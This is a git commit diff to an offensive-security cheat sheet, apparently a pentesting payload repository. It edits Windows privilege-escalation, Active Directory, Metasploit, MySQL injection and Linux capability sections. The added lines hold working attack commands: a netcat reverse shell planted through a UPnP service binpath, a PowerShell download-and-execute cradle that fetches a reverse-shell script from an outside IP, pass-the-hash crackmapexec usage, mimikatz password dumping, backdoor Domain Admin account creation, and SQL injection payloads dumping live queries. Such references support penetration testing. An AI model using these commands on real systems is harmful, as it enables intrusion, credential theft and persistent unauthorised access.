SQL informationschema.processlist + UPNP warning + getcap -ep
parent
b1a05d1aab
commit
f88da43e1c
|
@ -22,11 +22,6 @@
|
|||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
* [PrivExchange attack](#privexchange-attack)
|
||||
* [Password spraying](#password-spraying)
|
||||
* [Privilege Escalation](#privilege-escalation)
|
||||
* [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato)
|
||||
* [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
|
||||
* [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
|
||||
|
||||
## Tools
|
||||
|
||||
|
@ -56,6 +51,7 @@
|
|||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||
crackmapexec smb -L
|
||||
crackmapexec smb -M name_module -o VAR=DATA
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||
|
@ -598,56 +594,6 @@ Most of the time the best passwords to spray are :
|
|||
- $Companyname1
|
||||
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### PrivEsc Local Admin - Token Impersonation (RottenPotato)
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
```c
|
||||
getuid
|
||||
getprivs
|
||||
use incognito
|
||||
list\_tokens -u
|
||||
cd c:\temp\
|
||||
execute -Hc -f ./rot.exe
|
||||
impersonate\_token "NT AUTHORITY\SYSTEM"
|
||||
```
|
||||
|
||||
```powershell
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||
```
|
||||
|
||||
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
|
||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||
|
||||
```powershell
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||||
|
||||
Binary exe : https://github.com/Meatballs1/ms16-032
|
||||
|
||||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||||
```
|
||||
|
||||
### PrivEsc Local Admin - MS17-010 (Eternal Blue)
|
||||
|
||||
```c
|
||||
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
|
||||
```
|
||||
|
||||
### From Local Admin to Domain Admin
|
||||
|
||||
```powershell
|
||||
net user hacker2 hacker123 /add /Domain
|
||||
net group "Domain Admins" hacker2 /add /domain
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||
|
|
|
@ -242,6 +242,14 @@ sudo chmod +s /tmp/suid # setuid bit
|
|||
|
||||
### Interesting capabilities
|
||||
|
||||
Having the capability =ep means the binary has all the capabilities.
|
||||
```powershell
|
||||
$ getcap openssl /usr/bin/openssl
|
||||
openssl=ep
|
||||
```
|
||||
|
||||
Alternatively the following capabilities can be used in order to upgrade your current privileges.
|
||||
|
||||
```powershell
|
||||
cap_dac_read_search # read anything
|
||||
cap_setuid+ep # setuid
|
||||
|
|
|
@ -153,7 +153,9 @@ execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
|
|||
load mimikatz
|
||||
mimikatz_command -f version
|
||||
mimikatz_command -f samdump::hashes
|
||||
mimikatz_command -f sekurlsa::wdigest
|
||||
mimikatz_command -f sekurlsa::searchPasswords
|
||||
mimikatz_command -f sekurlsa::logonPasswords full
|
||||
```
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -15,6 +15,10 @@
|
|||
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
||||
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
||||
* [EoP - Runas](#eop---runas)
|
||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
|
||||
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
|
||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||
|
||||
## Tools
|
||||
|
||||
|
@ -421,9 +425,12 @@ You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify
|
|||
### Example with Windows XP SP1
|
||||
|
||||
```powershell
|
||||
$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
|
||||
sc config upnphost obj=".\LocalSystem" password=""
|
||||
# NOTE: spaces are mandatory for this exploit to work !
|
||||
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
|
||||
sc config upnphost obj= ".\LocalSystem" password= ""
|
||||
sc qc upnphost
|
||||
sc config upnphost depend= ""
|
||||
net start upnphost
|
||||
```
|
||||
|
||||
If it fails because of a missing dependency, try the following commands.
|
||||
|
@ -586,6 +593,52 @@ $ computer = "<hostname>"
|
|||
```
|
||||
|
||||
|
||||
## EoP - Common Vulnerabilities and Exposure
|
||||
|
||||
### Token Impersonation (RottenPotato)
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
```c
|
||||
getuid
|
||||
getprivs
|
||||
use incognito
|
||||
list\_tokens -u
|
||||
cd c:\temp\
|
||||
execute -Hc -f ./rot.exe
|
||||
impersonate\_token "NT AUTHORITY\SYSTEM"
|
||||
```
|
||||
|
||||
```powershell
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||
```
|
||||
|
||||
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
|
||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||
|
||||
```powershell
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||||
|
||||
Binary exe : https://github.com/Meatballs1/ms16-032
|
||||
|
||||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||||
```
|
||||
|
||||
### MS17-010 (Eternal Blue)
|
||||
|
||||
```c
|
||||
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -3,9 +3,10 @@
|
|||
## TIP 1 - Create your credential :D
|
||||
|
||||
```powershell
|
||||
net user hacker hacker /add
|
||||
net user hacker hacker1234* /add
|
||||
net localgroup administrators hacker /add
|
||||
net group "Domain Admins" hacker /ADD /DOMAIN
|
||||
net localgroup "Remote Desktop Users" hacker /add
|
||||
net group "Domain Admins" hacker /add /domain
|
||||
```
|
||||
|
||||
Some info about your user
|
||||
|
|
|
@ -165,6 +165,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
|||
## References
|
||||
|
||||
* filedescriptor
|
||||
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
|
||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
|
|
|
@ -19,6 +19,7 @@
|
|||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||
* [MYSQL Time Based](#mysql-time-based)
|
||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||
* [MYSQL Current queries](#mysql-current-queries)
|
||||
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
|
||||
* [MYSQL Write a shell](#mysql-write-a-shell)
|
||||
* [MYSQL UDF command execution](#mysql-udf-command-execution)
|
||||
|
@ -223,6 +224,17 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
|||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||
```
|
||||
|
||||
## MYSQL Current queries
|
||||
|
||||
This table can list all operations that DB is performing at the moment.
|
||||
|
||||
```sql
|
||||
union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
|
||||
|
||||
-- Dump in one shot example for the table content.
|
||||
union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 #
|
||||
```
|
||||
|
||||
## MYSQL Read content of a file
|
||||
|
||||
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
|
||||
|
@ -305,4 +317,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
|
|||
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
|
||||
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
|
||||
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
|
||||
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
|
||||
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
|
||||
- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
|
Loading…
Reference in New Issue